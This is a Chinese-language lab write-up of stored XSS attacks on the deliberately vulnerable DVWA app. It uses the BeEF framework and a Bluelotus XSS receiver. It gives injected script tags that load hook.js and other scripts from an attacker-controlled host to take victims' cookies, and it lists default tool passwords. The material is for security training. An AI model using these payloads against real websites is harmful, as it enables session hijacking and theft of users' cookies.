实验一:XSS攻击框架beef
实验环境:kali、DVWA
实验步骤:
1、打开kali的命令行,输入:beef-xs,获得一个js脚本,并跳出beef登录界面,输入用户名和密码(默认都是beef)
2、输入ifconfig查看ip,复制js代码,并将ip改为本机ip,此时js代码如下:
<script src="http://192.168.1.106:3000/hook.js"></script>
3.在低级DVWA中的储存式XSS模块中输入以下内容,可看到kali上面有了变化
4.此时,便可进行攻击,举例说明:
依次点击下边序号所指的部分,即可获得其cookie值
实验二:Bluelotus_XSSReceiver搭建的XSS平台
实验环境:Bluelotus_XSSReceiver、DVWA
实验步骤:
1.在Github网站上下载Bluelotus_XSSReceiver环境安装包,并将其放在www目录下,访问该安装包的路径,然后登陆(密码为:blueloyus),进入以下页面
2.选择一个js脚本,复制其地址,并将ip改为自己的ip,代码如下:
<script src="http://192.168.1.101:81/BlueLotus/myjs/copyright.js"></script>
3.在低级别DVWA中的储存型XSS模块,输入js脚本,上传留言,显示下面内容:
4.同样也可选择其他js脚本,如下图(这里需要将路径修改为攻击者Bluelotus_XSSReceiver的路径):
脚本如下:
<script src="http://192.168.1.101:81/BlueLotus/myjs/my.js"></script>
5.在低级别DVWA中的储存型XSS模块,输入js脚本,上传留言,在Bluelotus_XSSReceiver显示下面内容,证明成功:
